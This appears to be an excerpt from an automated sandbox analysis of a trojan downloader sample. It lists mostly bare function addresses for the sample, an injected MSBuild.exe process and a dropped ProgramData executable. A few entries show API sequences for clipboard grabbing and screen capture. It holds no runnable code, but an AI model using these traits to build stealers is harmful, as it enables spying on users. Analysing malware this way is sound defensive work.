Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 13_2_00436F40 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

13_2_00436F40

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_00411F2A CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

2_2_00411F2A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0040145B GetCurrentProcess,NtQueryInformationProcess,	2_2_0040145B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA3B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	2_2_6CA3B700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA3B8C0 rand_s,NtQueryVirtualMemory,	2_2_6CA3B8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA3B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	2_2_6CA3B910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6C9DF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	2_2_6C9DF280

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C420FE	0_2_00C420FE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C5E04E	0_2_00C5E04E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C571FF	0_2_00C571FF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C4E182	0_2_00C4E182
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C9C243	0_2_00C9C243
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C903F7	0_2_00C903F7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C8B4F3	0_2_00C8B4F3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C9C5E1	0_2_00C9C5E1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C88588	0_2_00C88588
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C426C3	0_2_00C426C3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C517E0	0_2_00C517E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C55792	0_2_00C55792
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C8A793	0_2_00C8A793
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C5F8B3	0_2_00C5F8B3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C9C9B3	0_2_00C9C9B3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C4893C	0_2_00C4893C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C9CD9B	0_2_00C9CD9B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C9BDAE	0_2_00C9BDAE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C41E74	0_2_00C41E74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0041C603	2_2_0041C603
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0041B8A3	2_2_0041B8A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0042DAC3	2_2_0042DAC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0042D353	2_2_0042D353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0042D6F1	2_2_0042D6F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00419698	2_2_00419698
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0042DEAB	2_2_0042DEAB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0042CEBE	2_2_0042CEBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6C9D35A0	2_2_6C9D35A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA334A0	2_2_6CA334A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA3C4A0	2_2_6CA3C4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6C9E6C80	2_2_6C9E6C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6C9FD4D0	2_2_6C9FD4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA16CF0	2_2_6CA16CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6C9E64C0	2_2_6C9E64C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6C9DD4E0	2_2_6C9DD4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA4542B	2_2_6CA4542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA4AC00	2_2_6CA4AC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA15C10	2_2_6CA15C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA22C10	2_2_6CA22C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6C9E5440	2_2_6C9E5440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA4545C	2_2_6CA4545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA385F0	2_2_6CA385F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA10DD0	2_2_6CA10DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6C9FED10	2_2_6C9FED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6C9EFD00	2_2_6C9EFD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA00512	2_2_6CA00512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA34EA0	2_2_6CA34EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6C9F5E90	2_2_6C9F5E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA3E680	2_2_6CA3E680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA476E3	2_2_6CA476E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6C9DBEF0	2_2_6C9DBEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6C9EFEF0	2_2_6C9EFEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA39E30	2_2_6CA39E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA25600	2_2_6CA25600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA17E10	2_2_6CA17E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA46E63	2_2_6CA46E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6C9F9E50	2_2_6C9F9E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6C9F4640	2_2_6C9F4640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA22E4E	2_2_6CA22E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6C9DC670	2_2_6C9DC670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA13E50	2_2_6CA13E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA277A0	2_2_6CA277A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA06FF0	2_2_6CA06FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6C9DDFE0	2_2_6C9DDFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6C9E9F00	2_2_6C9E9F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA17710	2_2_6CA17710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA060A0	2_2_6CA060A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA158E0	2_2_6CA158E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA450C7	2_2_6CA450C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6C9FC0E0	2_2_6C9FC0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA1B820	2_2_6CA1B820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA24820	2_2_6CA24820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6C9E7810	2_2_6C9E7810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6C9F8850	2_2_6C9F8850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6C9FD850	2_2_6C9FD850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA1F070	2_2_6CA1F070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA0D9B0	2_2_6CA0D9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA15190	2_2_6CA15190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA32990	2_2_6CA32990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6C9DC9A0	2_2_6C9DC9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA2B970	2_2_6CA2B970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA4B170	2_2_6CA4B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6C9FA940	2_2_6C9FA940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6C9ED960	2_2_6C9ED960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA04AA0	2_2_6CA04AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA42AB0	2_2_6CA42AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6C9ECAB0	2_2_6C9ECAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA4BA90	2_2_6CA4BA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6C9D22A0	2_2_6C9D22A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA1E2F0	2_2_6CA1E2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA18AC0	2_2_6CA18AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6C9F1AF0	2_2_6C9F1AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA19A60	2_2_6CA19A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6C9DF380	2_2_6C9DF380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA453C8	2_2_6CA453C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA1D320	2_2_6CA1D320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6C9D5340	2_2_6C9D5340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6C9EC370	2_2_6C9EC370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CB4ECD0	2_2_6CB4ECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CAEECC0	2_2_6CAEECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CBCAC30	2_2_6CBCAC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CBB6C00	2_2_6CBB6C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CAFAC60	2_2_6CAFAC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CC7CDC0	2_2_6CC7CDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CAF4DB0	2_2_6CAF4DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CB86D90	2_2_6CB86D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CC1AD50	2_2_6CC1AD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CBBED70	2_2_6CBBED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CC78D20	2_2_6CC78D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CB76E90	2_2_6CB76E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CAFAEC0	2_2_6CAFAEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CB90EC0	2_2_6CB90EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CBD0E20	2_2_6CBD0E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CB8EE70	2_2_6CB8EE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CAFEFB0	2_2_6CAFEFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CBCEFF0	2_2_6CBCEFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CAF0FE0	2_2_6CAF0FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CC38FB0	2_2_6CC38FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CAF6F10	2_2_6CAF6F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CBB2F70	2_2_6CBB2F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CC30F20	2_2_6CC30F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CB5EF40	2_2_6CB5EF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CBF68E0	2_2_6CBF68E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CB40820	2_2_6CB40820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CB7A820	2_2_6CB7A820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CBC4840	2_2_6CBC4840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CBB09B0	2_2_6CBB09B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CB809A0	2_2_6CB809A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CBAA9A0	2_2_6CBAA9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CC0C9E0	2_2_6CC0C9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CB249F0	2_2_6CB249F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CB46900	2_2_6CB46900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CB28960	2_2_6CB28960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CB6EA80	2_2_6CB6EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CBA8A30	2_2_6CBA8A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CB9EA00	2_2_6CB9EA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CB6CA70	2_2_6CB6CA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CB90BA0	2_2_6CB90BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CBF6BE0	2_2_6CBF6BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CC1A480	2_2_6CC1A480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CB364D0	2_2_6CB364D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CB8A4D0	2_2_6CB8A4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CB7A430	2_2_6CB7A430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CB54420	2_2_6CB54420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CB08460	2_2_6CB08460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CAE45B0	2_2_6CAE45B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CB7E5F0	2_2_6CB7E5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CBBA5E0	2_2_6CBBA5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CC38550	2_2_6CC38550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CB90570	2_2_6CB90570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CB52560	2_2_6CB52560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CB48540	2_2_6CB48540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CBF4540	2_2_6CBF4540
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_000D20FE	11_2_000D20FE
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_000EE04E	11_2_000EE04E
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_001460E0	11_2_001460E0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_00110193	11_2_00110193
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_000DE182	11_2_000DE182
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_001241D2	11_2_001241D2
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_001341C0	11_2_001341C0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_001001E3	11_2_001001E3
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_0012C217	11_2_0012C217
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_0010023E	11_2_0010023E
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_00114387	11_2_00114387
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_0010C3C0	11_2_0010C3C0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_0012A3F0	11_2_0012A3F0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_001343F0	11_2_001343F0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_00122400	11_2_00122400
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_00100427	11_2_00100427
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_001264A0	11_2_001264A0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_001004EC	11_2_001004EC
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_001305BE	11_2_001305BE
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_00102660	11_2_00102660
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_000D26C3	11_2_000D26C3
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_0010C7B0	11_2_0010C7B0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_001067C0	11_2_001067C0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_0012E7F0	11_2_0012E7F0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_0013A860	11_2_0013A860
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_001088E6	11_2_001088E6
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_000D893C	11_2_000D893C
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_0011A99E	11_2_0011A99E
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_00120A2E	11_2_00120A2E
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_00100A9A	11_2_00100A9A
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_0013AAC0	11_2_0013AAC0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_0010AAF0	11_2_0010AAF0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_00122B20	11_2_00122B20
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_00110B5A	11_2_00110B5A
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_00144B67	11_2_00144B67
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_0011AC63	11_2_0011AC63
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_00142E11	11_2_00142E11
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_00108FD0	11_2_00108FD0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_0012F010	11_2_0012F010
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_0013B190	11_2_0013B190
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_000E71FF	11_2_000E71FF
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_00107210	11_2_00107210
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_00143350	11_2_00143350
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_00109490	11_2_00109490
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_0011B486	11_2_0011B486
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_00119486	11_2_00119486
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_0011F6D0	11_2_0011F6D0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_00143760	11_2_00143760
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_000E5792	11_2_000E5792
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_000E17E0	11_2_000E17E0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_00115872	11_2_00115872
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_00131882	11_2_00131882
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_00145880	11_2_00145880
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_000EF8B3	11_2_000EF8B3
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_00135980	11_2_00135980
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_0012DA85	11_2_0012DA85
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_00121AF0	11_2_00121AF0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_00145B20	11_2_00145B20
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_00109B50	11_2_00109B50
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_00135BF0	11_2_00135BF0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_0010DC30	11_2_0010DC30
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_00143C50	11_2_00143C50
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_00105DC0	11_2_00105DC0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_00145DF0	11_2_00145DF0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_00103E40	11_2_00103E40
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_000D1E74	11_2_000D1E74
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_00117EFF	11_2_00117EFF
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_000FFEF0	11_2_000FFEF0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_0010DFB0	11_2_0010DFB0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_00113FB0	11_2_00113FB0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_0013FFD0	11_2_0013FFD0
